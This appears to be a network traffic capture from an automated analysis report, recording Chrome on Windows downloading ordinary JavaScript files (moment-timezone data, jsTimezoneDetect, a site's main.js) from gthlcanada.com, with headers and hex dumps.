                                                                                                                          2025-01-13 21:01:16 UTC1369INData Raw: 20 2f 2f 20 63 68 61 72 73 2e 20 50 61 73 74 65 20 65 76 65 6e 74 73 20 73 68 6f 75 6c 64 20 6e 6f 74 20 6c 65 61 64 20 74 6f 20 42 65 66 6f 72 65 49 6e 70 75 74 20 65 76 65 6e 74 73 2e 0a 20 20 20 20 20 20 20 20 20 20 66 61 6c 6c 62 61 63 6b 43 68 61 72 73 20 3d 20 6e 75 6c 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b 3b 0a 20 20 20 20 20 20 20 20 63 61 73 65 20 74 6f 70 4c 65 76 65 6c 54 79 70 65 73 2e 74 6f 70 4b 65 79 50 72 65 73 73 3a 0a 20 20 20 20 20 20 20 20 20 20 2f 2a 2a 0a 20 20 20 20 20 20 20 20 20 20 20 2a 20 41 73 20 6f 66 20 76 32 37 2c 20 46 69 72 65 66 6f 78 20 6d 61 79 20 66 69 72 65 20 6b 65 79 70 72 65 73 73 20 65 76 65 6e 74 73 20 65 76 65 6e 20 77 68 65 6e 20 6e 6f 20 63 68 61 72 61 63 74 65 72 0a 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: // chars. Paste events should not lead to BeforeInput events. fallbackChars = null; break; case topLevelTypes.topKeyPress: /** * As of v27, Firefox may fire keypress events even when no character
                                                                                                                          2025-01-13 21:01:16 UTC1369INData Raw: 3d 3d 20 6e 75 6c 6c 29 20 7b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 63 68 61 72 73 20 3d 20 66 61 6c 6c 62 61 63 6b 43 68 61 72 73 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2f 2f 20 49 66 20 6e 6f 20 63 68 61 72 61 63 74 65 72 73 20 61 72 65 20 62 65 69 6e 67 20 69 6e 73 65 72 74 65 64 2c 20 6e 6f 20 42 65 66 6f 72 65 49 6e 70 75 74 20 65 76 65 6e 74 20 73 68 6f 75 6c 64 0a 20 20 20 20 2f 2f 20 62 65 20 66 69 72 65 64 2e 0a 20 20 20 20 69 66 20 28 21 63 68 61 72 73 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 76 61 72 20 65 76 65 6e 74 20 3d 20 53 79 6e 74 68 65 74 69 63 49 6e 70 75 74 45 76 65 6e 74 2e 67 65 74 50 6f 6f 6c 65 64 28 0a 20 20 20 20 20 20 65 76
                                                                                                                          Data Ascii: == null) { return; } chars = fallbackChars; } // If no characters are being inserted, no BeforeInput event should // be fired. if (!chars) { return; } var event = SyntheticInputEvent.getPooled( ev
                                                                                                                          2025-01-13 21:01:16 UTC1369INData Raw: 79 20 6f 66 20 65 6c 65 6d 65 6e 74 73 2e 0a 20 2a 2f 0a 0a 76 61 72 20 43 53 53 43 6f 72 65 20 3d 20 7b 0a 0a 20 20 2f 2a 2a 0a 20 20 20 2a 20 41 64 64 73 20 74 68 65 20 63 6c 61 73 73 20 70 61 73 73 65 64 20 69 6e 20 74 6f 20 74 68 65 20 65 6c 65 6d 65 6e 74 20 69 66 20 69 74 20 64 6f 65 73 6e 27 74 20 61 6c 72 65 61 64 79 20 68 61 76 65 20 69 74 2e 0a 20 20 20 2a 0a 20 20 20 2a 20 40 70 61 72 61 6d 20 7b 44 4f 4d 45 6c 65 6d 65 6e 74 7d 20 65 6c 65 6d 65 6e 74 20 74 68 65 20 65 6c 65 6d 65 6e 74 20 74 6f 20 73 65 74 20 74 68 65 20 63 6c 61 73 73 20 6f 6e 0a 20 20 20 2a 20 40 70 61 72 61 6d 20 7b 73 74 72 69 6e 67 7d 20 63 6c 61 73 73 4e 61 6d 65 20 74 68 65 20 43 53 53 20 63 6c 61 73 73 4e 61 6d 65 0a 20 20 20 2a 20 40 72 65 74 75 72 6e 20 7b 44 4f 4d
                                                                                                                          Data Ascii: y of elements. */var CSSCore = { /** * Adds the class passed in to the element if it doesn't already have it. * * @param {DOMElement} element the element to set the class on * @param {string} className the CSS className * @return {DOM


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          41192.168.11.2049844137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:16 UTC642OUTGET /app/themes/base/bower_components/moment-timezone/builds/moment-timezone-with-data.min.js HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:17 UTC524INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:16 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 195222
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Sat, 14 Nov 2020 13:50:27 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:20 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 961513649 961417482
                                                                                                                          Age: 117
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"5fafe0a3-2fa96"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:17 UTC15860INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 63 2c 4d 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 4d 28 72 65 71 75 69 72 65 28 22 6d 6f 6d 65 6e 74 22 29 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6d 6f 6d 65 6e 74 22 5d 2c 4d 29 3a 4d 28 63 2e 6d 6f 6d 65 6e 74 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 6f 69 64 20 30 3d 3d 3d 62 2e 76 65 72 73 69 6f 6e 26 26 62 2e 64 65 66 61 75 6c 74 26 26 28 62 3d 62 2e 64 65 66 61 75 6c 74 29 3b 76 61 72 20
                                                                                                                          Data Ascii: !function(c,M){"use strict";"object"==typeof module&&module.exports?module.exports=M(require("moment")):"function"==typeof define&&define.amd?define(["moment"],M):M(c.moment)}(this,function(b){"use strict";void 0===b.version&&b.default&&(b=b.default);var
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: 58 30 20 31 43 31 30 20 4d 6e 30 20 31 43 31 30 20 4c 58 30 20 31 43 31 30 20 4c 58 30 20 31 43 31 30 20 4c 58 30 20 31 43 31 30 20 4d 6e 30 20 4d 4e 30 20 32 6a 7a 30 20 4d 4e 30 20 34 6c 58 30 20 75 31 30 20 35 4c 62 30 20 31 70 42 30 20 46 6e 7a 30 20 75 31 30 20 75 4c 30 20 31 76 64 30 20 53 4c 30 20 31 76 64 30 20 53 4c 30 20 31 76 64 30 20 31 37 7a 30 20 31 63 4e 30 20 31 66 7a 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 61 73 6e 30 20 44 62 30 20 7a 76 64 30 20 42 7a 30 20 31 74 42 30 20 54 58 30 20 31 7a 65 30 20 54 58 30 20 31 6c 64 30 20 57 4b 30 20 31 77 70 30 20 54 58 30 20 41 34 70 30 20 75 4c 30 7c 22 2c 22 41 6d 65 72 69 63 61 2f 41 72 67 65 6e 74 69 6e 61 2f 4c 61 5f 52 69 6f 6a 61 7c 43 4d 54 20 2d 30 34 20 2d 30 33 20 2d 30 32 7c
                                                                                                                          Data Ascii: X0 1C10 Mn0 1C10 LX0 1C10 LX0 1C10 LX0 1C10 Mn0 MN0 2jz0 MN0 4lX0 u10 5Lb0 1pB0 Fnz0 u10 uL0 1vd0 SL0 1vd0 SL0 1vd0 17z0 1cN0 1fz0 1cN0 1cL0 1cN0 asn0 Db0 zvd0 Bz0 1tB0 TX0 1ze0 TX0 1ld0 WK0 1wp0 TX0 A4p0 uL0|","America/Argentina/La_Rioja|CMT -04 -03 -02|
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: 33 2e 63 20 57 4c 30 20 31 71 4e 30 20 57 4c 30 7c 31 31 65 35 22 2c 22 41 6d 65 72 69 63 61 2f 54 69 6a 75 61 6e 61 7c 4c 4d 54 20 4d 53 54 20 50 53 54 20 50 44 54 20 50 57 54 20 50 50 54 7c 37 4d 2e 34 20 37 30 20 38 30 20 37 30 20 37 30 20 37 30 7c 30 31 32 31 32 33 32 34 35 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 7c 2d 31 55 51 45 30 20 34 50 58 30 20 38 6d 4d 30 20 38 6c 63
                                                                                                                          Data Ascii: 3.c WL0 1qN0 WL0|11e5","America/Tijuana|LMT MST PST PDT PWT PPT|7M.4 70 80 70 70 70|012123245232323232323232323232323232323232323232323232323232323232323232323232323232323232323232323232323232323232323232323232323232323232323232323232|-1UQE0 4PX0 8mM0 8lc
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 52 64 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 52 64 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 7c 33 33 65 33 22 2c 22 41 6d 65 72 69 63 61 2f 4b 65 6e 74 75 63 6b 79 2f 4c 6f 75 69 73 76 69 6c 6c 65 7c 43 53 54 20 43 44 54 20 43 57 54 20 43 50 54 20 45 53 54 20 45 44 54 7c 36 30 20 35 30 20 35 30 20 35 30 20 35 30 20 34 30 7c 30 31 30 31 30 31 30 31 30 32 33 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 34 35 34 35 34 35 34 35 34 35 34 35 34 31 34 35
                                                                                                                          Data Ascii: p0 1zb0 Op0 1zb0 Op0 1zb0 Rd0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0 Rd0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0|33e3","America/Kentucky/Louisville|CST CDT CWT CPT EST EDT|60 50 50 50 50 40|01010101023010101010101010101010101014545454545454145
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: 30 20 52 64 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 52 64 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 52 64 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 52 64 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 7c 33 38 65 32 22 2c 22 41 6d 65 72 69 63 61 2f 4e 6f 72 6f 6e 68 61 7c 4c 4d 54 20 2d 30 32 20 2d 30 31 7c 32 39 2e 45 20 32 30 20 31 30 7c 30 31 32 31 32 31 32 31 32
                                                                                                                          Data Ascii: 0 Rd0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0 Rd0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0 Rd0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0 Rd0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0|38e2","America/Noronha|LMT -02 -01|29.E 20 10|012121212
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 52 64 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 7c 31 31 65 34 22 2c 22 41 6d 65 72 69 63 61 2f 56 61 6e 63 6f 75 76 65 72 7c 50 53 54 20 50 44 54 20 50 57 54 20 50 50 54 7c 38 30 20 37 30 20 37 30 20 37 30 7c 30 31 30 32 33 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30
                                                                                                                          Data Ascii: 0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0 Rd0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0|11e4","America/Vancouver|PST PDT PWT PPT|80 70 70 70|010230101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 31 7c 2d 31 50 63 34 7a 2e 63 20 65 55 6e 7a 2e 63 20 32 33 43 4c 30 20 31 64 62 30 20 31 63 4e 30 20 31 64 62 30 20 31 63 4e 30 20 31 64 62 30 20 31 64 64 30 20 31 63 4f 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 66 41 30 20 32 68 42 30 7c 37 36 65 34 22 2c 22 41 73 69 61 2f 46 61 6d 61 67 75 73 74 61 7c 4c 4d 54 20 45 45 54 20 45 45 53 54 20 2b 30 33 7c 2d 32 66 2e 4d 20 2d 32 30 20 2d 33 30 20 2d 33 30 7c 30 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31
                                                                                                                          Data Ascii: 3232323232323232321|-1Pc4z.c eUnz.c 23CL0 1db0 1cN0 1db0 1cN0 1db0 1dd0 1cO0 1cM0 1cM0 1cM0 1cM0 1cM0 1cM0 1cM0 1cM0 1cM0 1cM0 1cM0 1fA0 2hB0|76e4","Asia/Famagusta|LMT EET EEST +03|-2f.M -20 -30 -30|01212121212121212121212121212121212121212121212121212121
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: 73 69 61 2f 55 73 74 2d 4e 65 72 61 7c 4c 4d 54 20 2b 30 38 20 2b 30 39 20 2b 31 32 20 2b 31 31 20 2b 31 30 7c 2d 39 77 2e 53 20 2d 38 30 20 2d 39 30 20 2d 63 30 20 2d 62 30 20 2d 61 30 7c 30 31 32 33 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 35 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 35 7c 2d 32 31 51 39 77 2e 53 20 70 41 70 77 2e 53 20 32 33 43 4c 30 20 31 64 39 30 20 31 63 4e 30 20 31 64 62 30 20 31 63 4e 30 20 31 64 62 30 20 31 64 64 30 20 31 63 4f 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 66 41 30 20 32 70 42 30 20 49 4d 30
                                                                                                                          Data Ascii: sia/Ust-Nera|LMT +08 +09 +12 +11 +10|-9w.S -80 -90 -c0 -b0 -a0|012343434343434343434345434343434343434343434343434343434343434345|-21Q9w.S pApw.S 23CL0 1d90 1cN0 1db0 1cN0 1db0 1dd0 1cO0 1cM0 1cM0 1cM0 1cM0 1cM0 1cM0 1cM0 1cM0 1cM0 1cM0 1cM0 1fA0 2pB0 IM0
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: 30 20 31 4e 62 30 20 41 70 30 20 31 7a 62 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 20 31 71 4c 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 20 31 71 4c 30 20 57 4e 30 20 31 71 4c 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 20 31 71 4c 30 20 57 4e 30 20 31 71 4c 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 7c 33 30 65 32 22 2c 22 43 53 54 36 43 44 54 7c 43 53 54 20 43 44 54 20 43 57 54 20 43 50 54 7c 36 30 20 35 30 20 35 30 20 35 30 7c 30 31 30 31 30 32 33 30 31 30 31 30 31
                                                                                                                          Data Ascii: 0 1Nb0 Ap0 1zb0 11B0 1nX0 11B0 1nX0 11B0 1nX0 11B0 1nX0 11B0 1qL0 11B0 1nX0 11B0 1nX0 11B0 1nX0 11B0 1nX0 11B0 1qL0 WN0 1qL0 11B0 1nX0 11B0 1nX0 11B0 1nX0 11B0 1nX0 11B0 1qL0 WN0 1qL0 11B0 1nX0 11B0|30e2","CST6CDT|CST CDT CWT CPT|60 50 50 50|0101023010101
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: 31 6f 30 30 20 31 31 41 30 20 31 71 4d 30 20 57 4d 30 20 31 71 4d 30 20 57 4d 30 20 31 71 4d 30 20 57 4d 30 20 31 71 4d 30 20 31 31 41 30 20 31 6f 30 30 20 31 31 41 30 20 31 6f 30 30 7c 36 37 65 34 22 2c 22 45 75 72 6f 70 65 2f 43 6f 70 65 6e 68 61 67 65 6e 7c 43 45 54 20 43 45 53 54 7c 2d 31 30 20 2d 32 30 7c 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 7c 2d 32 61 7a 43 30 20 54 7a 30 20 56 75 4f 30 20 36
                                                                                                                          Data Ascii: 1o00 11A0 1qM0 WM0 1qM0 WM0 1qM0 WM0 1qM0 11A0 1o00 11A0 1o00|67e4","Europe/Copenhagen|CET CEST|-10 -20|0101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010|-2azC0 Tz0 VuO0 6


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          42192.168.11.2049847137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:16 UTC615OUTGET /app/themes/base/bower_components/jsTimezoneDetect/jstz.min.js HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:16 UTC520INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:16 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 5566
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Tue, 25 Feb 2014 15:53:03 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:54 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 960893680 960893452
                                                                                                                          Age: 82
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"530cbc5f-15be"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:16 UTC5566INData Raw: 2f 2a 21 20 6a 73 54 69 6d 65 7a 6f 6e 65 44 65 74 65 63 74 20 2d 20 76 31 2e 30 2e 36 20 2d 20 32 30 31 34 2d 30 32 2d 32 35 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 61 3d 22 73 22 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 2d 61 2e 67 65 74 54 69 6d 65 7a 6f 6e 65 4f 66 66 73 65 74 28 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 62 3f 62 3a 30 7d 2c 64 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 3d 6e 65 77 20 44 61 74 65 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 61 26 26 64 2e 73 65 74 46 75 6c 6c 59 65 61 72 28 61 29 2c 64 2e 73 65 74 4d 6f 6e 74 68 28 62 29 2c 64 2e 73 65 74 44 61 74 65
                                                                                                                          Data Ascii: /*! jsTimezoneDetect - v1.0.6 - 2014-02-25 */!function(a){var b=function(){"use strict";var a="s",c=function(a){var b=-a.getTimezoneOffset();return null!==b?b:0},d=function(a,b,c){var d=new Date;return void 0!==a&&d.setFullYear(a),d.setMonth(b),d.setDate


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          43192.168.11.2049846137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:16 UTC600OUTGET /app/themes/base/assets/dist/scripts/js/main.js HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:17 UTC523INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:16 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 653479
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Tue, 26 Jan 2021 19:13:09 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:54 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 961513651 961970747
                                                                                                                          Age: 82
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"601069c5-9f8a7"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:17 UTC15861INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 24 2c 20 41 64 33 30 30 2c 20 41 72 65 6e 61 54 61 62 6c 65 2c 20 42 61 73 65 54 61 62 6c 65 4d 69 78 69 6e 2c 20 42 72 61 63 6b 65 74 41 70 70 2c 20 42 72 61 63 6b 65 74 43 68 61 6d 70 69 6f 6e 2c 20 42 72 61 63 6b 65 74 4d 6f 64 61 6c 2c 20 42 72 61 63 6b 65 74 4d 6f 64 61 6c 47 61 6d 65 2c 20 42 72 61 63 6b 65 74 50 61 67 65 2c 20 42 72 61 63 6b 65 74 52 6f 75 6e 64 2c 20 42 72 61 63 6b 65 74 53 65 72 69 65 73 2c 20 42 72 61 63 6b 65 74 53 65 72 69 65 73 54 65 61 6d 2c 20 43 53 41 53 65 61 73 6f 6e 56 69 65 77 53 65 6c 65 63 74 2c 20 43 6f 61 63 68 65 73 54 61 62 6c 65 2c 20 44 69 76 69 73 69 6f 6e 53 74 61 6e 64 69 6e 67 73 2c 20 47 61 6d 65 42 6f 78 2c 20 47 61 6d 65 44 61 79 53 65 6c 65 63
                                                                                                                          Data Ascii: (function() { var $, Ad300, ArenaTable, BaseTableMixin, BracketApp, BracketChampion, BracketModal, BracketModalGame, BracketPage, BracketRound, BracketSeries, BracketSeriesTeam, CSASeasonViewSelect, CoachesTable, DivisionStandings, GameBox, GameDaySelec
